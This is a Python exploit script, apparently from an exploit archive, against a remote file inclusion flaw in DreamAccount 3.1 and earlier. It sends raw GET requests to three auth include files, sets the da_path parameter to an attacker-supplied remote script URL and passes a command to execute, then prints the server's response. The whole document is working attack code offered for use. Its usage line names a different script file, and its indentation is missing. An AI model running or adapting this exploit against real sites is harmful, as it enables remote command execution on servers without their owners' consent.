dreamaccount.py.txt

`#!/usr/bin/env python  
#  
# DreamAccount <= 3.1 (da_path) Multiple Remote File Include Vulnerability  
# found by, majorsecurity.  
# vendor, http://dreamcost.com  
#  
# python f_mg-2.62.py <remote_addr> <remote_port> <remote_path>  
<remote_cmd> <command>  
#  
# Federico Fazzi <[email protected]>  
# more info see advisory.  
  
# need register_global = On  
  
import os, sys, socket  
  
usage = "run: python %s [remote_addr] [remote_port] [remote_path]  
[remote_cmd] <command>" % os.path.basename(sys.argv[0])  
  
if len(sys.argv) < 6:  
print usage  
sys.exit()  
else:  
host = sys.argv[1]  
port = int(sys.argv[2])  
path = sys.argv[3]  
cmd = sys.argv[4]  
command = sys.argv[5]  
  
print "DreamAccount <= 3.1 (da_path) Multiple Remote File  
Include Vulnerability"  
print "Federico Fazzi <[email protected]>\n"  
  
# require($da_path . "setup.php");  
includers = ['auth.cookie.inc.php?da_path=',  
'auth.header.inc.php?da_path=',  
'auth.sessions.inc.php?da_path=']  
  
for inc in includers:  
print ">> i try string %s" % inc  
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
sock.connect((host, port))  
sock.send("GET %s%s%s?cmd=%s \r\n" % (path, inc, cmd,  
command))  
print "\n>> reading.. done\n"  
buf = sock.recv(2048)  
print buf  
`